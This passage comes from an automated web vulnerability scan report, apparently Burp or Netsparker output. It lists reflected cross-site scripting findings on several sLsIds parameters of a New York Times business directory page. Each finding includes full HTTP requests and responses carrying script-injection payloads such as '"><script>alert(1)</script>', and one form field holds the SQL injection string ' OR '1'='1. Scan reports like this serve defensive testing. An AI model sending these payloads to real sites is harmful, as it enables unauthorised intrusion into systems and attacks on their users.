Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91433
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=MGIPGLGAJNIONNPKLHOJCHHI; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIds3" value="125-563290,125-492069,125-487258,125-473954,125-516760,125-529105,125-529136,125-565044,125-452044,125-4715009bfe0"><script>alert(1)</script>2f05ec176569af554">
...[SNIP]...

4.254. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds4 request parameter is copied into the HTML document as plain text between tags. The payload 7eaf9<script>alert(1)</script>3c92dccf585 was submitted in the sLsIds4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-5631577eaf9<script>alert(1)</script>3c92dccf585&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:26:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-5631577eaf9<script>alert(1)</script>3c92dccf585&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-
...[SNIP]...

4.255. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds4 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eedcc"><script>alert(1)</script>ea156bddd51365539 was submitted in the sLsIds4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157eedcc"><script>alert(1)</script>ea156bddd51365539&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91516
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCCSTRAT=FGDDEGAAMJJFFCCFKNJJIGLF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIds4" value="125-558791,125-555521,125-561463,125-549434,125-434068,125-530728,125-564022,125-557581,125-560091,125-563157eedcc"><script>alert(1)</script>ea156bddd51365539">
...[SNIP]...

4.256. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds5 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 722a9"><script>alert(1)</script>b02d1e1ade882dae2 was submitted in the sLsIds5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240722a9"><script>alert(1)</script>b02d1e1ade882dae2&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91533
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=FHLKNADAONHLPMLBKDOHOJOJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIds5" value="125-491745,125-547950,125-509222,125-568138,125-557766,125-559177,125-537020,125-506111,125-560157,125-566240722a9"><script>alert(1)</script>b02d1e1ade882dae2">
...[SNIP]...

4.257. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds5 request parameter is copied into the HTML document as plain text between tags. The payload 4b1f0<script>alert(1)</script>fb742669c45 was submitted in the sLsIds5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-5662404b1f0<script>alert(1)</script>fb742669c45&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:27:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-5662404b1f0<script>alert(1)</script>fb742669c45&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-
...[SNIP]...

4.258. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds6 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35c88"><script>alert(1)</script>78828edc0a634b8c3 was submitted in the sLsIds6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

